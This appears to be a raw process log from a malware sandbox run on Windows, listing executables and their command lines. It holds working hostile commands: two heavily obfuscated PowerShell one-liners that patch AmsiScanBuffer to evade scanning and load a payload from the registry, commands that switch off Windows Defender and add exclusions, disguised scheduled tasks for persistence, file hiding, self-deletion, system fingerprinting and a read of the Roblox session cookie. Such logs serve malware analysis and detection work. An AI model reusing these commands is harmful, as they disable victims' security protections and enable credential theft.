C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\8Q1DJEUA1N7Q" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe

"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\888.exe

"C:\Users\Admin\AppData\Local\Temp\a\888.exe"

C:\Users\Admin\AppData\Local\Temp\a\50to.exe

"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UhSGjMbpBvuZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$thbOYdsVPKuerv,[Parameter(Position=1)][Type]$xiWsgPPiez)$OhahpFlFSVt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Ref'+'l'+''+[Char](101)+'c'+'t'+''+'e'+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+''+[Char](111)+'r'+'y'+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+'l'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+'l'+'a'+''+[Char](115)+'s'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+'a'+'l'+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+'A'+[Char](117)+''+'t'+'o'+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$OhahpFlFSVt.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+'cial'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+'H'+'i'+'d'+'e'+'B'+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$thbOYdsVPKuerv).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+',M'+'a'+''+'n'+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$OhahpFlFSVt.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+'',$xiWsgPPiez,$thbOYdsVPKuerv).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $OhahpFlFSVt.CreateType();}$WOxBaLpxLBfLh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+'cr'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+'e'+'N'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$BfAwityzpdOGbs=$WOxBaLpxLBfLh.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'r'+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+','+'St'+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iJaslFQbTeOIPZJXoVB=UhSGjMbpBvuZ @([String])([IntPtr]);$LaLvjwiczMungKIeROycyh=UhSGjMbpBvuZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$vbLaEfmoXeu=$WOxBaLpxLBfLh.GetMethod(''+[Char](71)+'et'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$mxMpRGzsSpPjGs=$BfAwityzpdOGbs.Invoke($Null,@([Object]$vbLaEfmoXeu,[Object](''+'L'+'oa'+'d'+''+[Char](76)+'i'+[Char](98)+''+'r'+'ar'+'y'+''+[Char](65)+'')));$NQviHZiIjlggXytqv=$BfAwityzpdOGbs.Invoke($Null,@([Object]$vbLaEfmoXeu,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$aQIeyXT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mxMpRGzsSpPjGs,$iJaslFQbTeOIPZJXoVB).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$oHhmOIkUGmlMaKZmT=$BfAwityzpdOGbs.Invoke($Null,@([Object]$aQIeyXT,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+'n'+[Char](66)+'u'+[Char](102)+'fe'+[Char](114)+'')));$DBkMMYBztd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NQviHZiIjlggXytqv,$LaLvjwiczMungKIeROycyh).Invoke($oHhmOIkUGmlMaKZmT,[uint32]8,4,[ref]$DBkMMYBztd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$oHhmOIkUGmlMaKZmT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NQviHZiIjlggXytqv,$LaLvjwiczMungKIeROycyh).Invoke($oHhmOIkUGmlMaKZmT,[uint32]8,0x20,[ref]$DBkMMYBztd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'r'+''+'u'+'ts'+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{0f963603-14a6-41ac-a96e-49c513dde3d5}

C:\Windows\system32\lsass.exe

"C:\Windows\system32\lsass.exe"

C:\Windows\System32\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im conhost.exe

C:\Users\Admin\AppData\Local\Temp\a\info.exe

"C:\Users\Admin\AppData\Local\Temp\a\info.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\50.exe

"C:\Users\Admin\AppData\Local\Temp\a\50.exe"

C:\Windows\SysWOW64\regedit.exe

regedit /s "C:\Windows\SysWOW64\ruts\11.reg

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XzSGgtVnuRCJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZwPKIPNdDGsxAn,[Parameter(Position=1)][Type]$MZmxauyXBC)$vFZYqoWQnHQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+'tedD'+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+'emo'+'r'+''+[Char](121)+'M'+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+','+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+[Char](110)+''+'s'+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+'Au'+[Char](116)+'o'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$vFZYqoWQnHQ.DefineConstructor('R'+'T'+''+'S'+'pe'+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+'m'+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$ZwPKIPNdDGsxAn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'ag'+'e'+''+[Char](100)+'');$vFZYqoWQnHQ.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'Ne'+'w'+'S'+[Char](108)+''+'o'+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$MZmxauyXBC,$ZwPKIPNdDGsxAn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $vFZYqoWQnHQ.CreateType();}$DSNlAcZSPOCre=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+'o'+'f'+'t'+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'N'+''+'a'+''+[Char](116)+'i'+[Char](118)+'eMe'+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+'s');$aEqbJxljOyJREp=$DSNlAcZSPOCre.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'P'+''+[Char](114)+'oc'+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fJvLoFUZaqRWJGgZvUy=XzSGgtVnuRCJ @([String])([IntPtr]);$ennhYWXsQxztiRumUHacEL=XzSGgtVnuRCJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aYbogmOhwbP=$DSNlAcZSPOCre.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+'a'+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+'r'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$dpsghQeCUIXNWc=$aEqbJxljOyJREp.Invoke($Null,@([Object]$aYbogmOhwbP,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+'Libr'+'a'+''+'r'+'y'+[Char](65)+'')));$dGhnJNhXlujxlKtab=$aEqbJxljOyJREp.Invoke($Null,@([Object]$aYbogmOhwbP,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$HEKbBJN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dpsghQeCUIXNWc,$fJvLoFUZaqRWJGgZvUy).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$DhDXmunwbzUgIUQQU=$aEqbJxljOyJREp.Invoke($Null,@([Object]$HEKbBJN,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+'a'+'nBu'+'f'+'f'+[Char](101)+'r')));$nBYmBOmmPJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dGhnJNhXlujxlKtab,$ennhYWXsQxztiRumUHacEL).Invoke($DhDXmunwbzUgIUQQU,[uint32]8,4,[ref]$nBYmBOmmPJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DhDXmunwbzUgIUQQU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dGhnJNhXlujxlKtab,$ennhYWXsQxztiRumUHacEL).Invoke($DhDXmunwbzUgIUQQU,[uint32]8,0x20,[ref]$nBYmBOmmPJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('r'+[Char](117)+''+[Char](116)+''+'s'+''+'s'+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c delete.bat

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\SH.exe

"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe

"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"

C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe

"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Users\Admin\AppData\Local\Temp\a\qwex.exe

"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 408 -p 5772 -ip 5772

C:\Users\Admin\AppData\Local\Temp\a\XW.exe

"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5772 -s 1504

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe

"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\boleto.exe

"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe

"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"

C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe

"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"

C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe

"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"

C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe

"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"

C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe

"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"

C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe

"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe

"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"

C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe

"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"

C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe

"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe

"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\msiexec.exe

msiexec /i vcredist.msi

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1920 -ip 1920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 1220

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4016 -s 384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\jy.exe

"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"

C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp

"C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp" /SL5="$D0230,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 612 -p 4548 -ip 4548

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4548 -s 492

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\a\test30.exe

"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second

C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe

"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4388 -s 2248

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 6052 -s 700

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\a\Discord.exe

"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

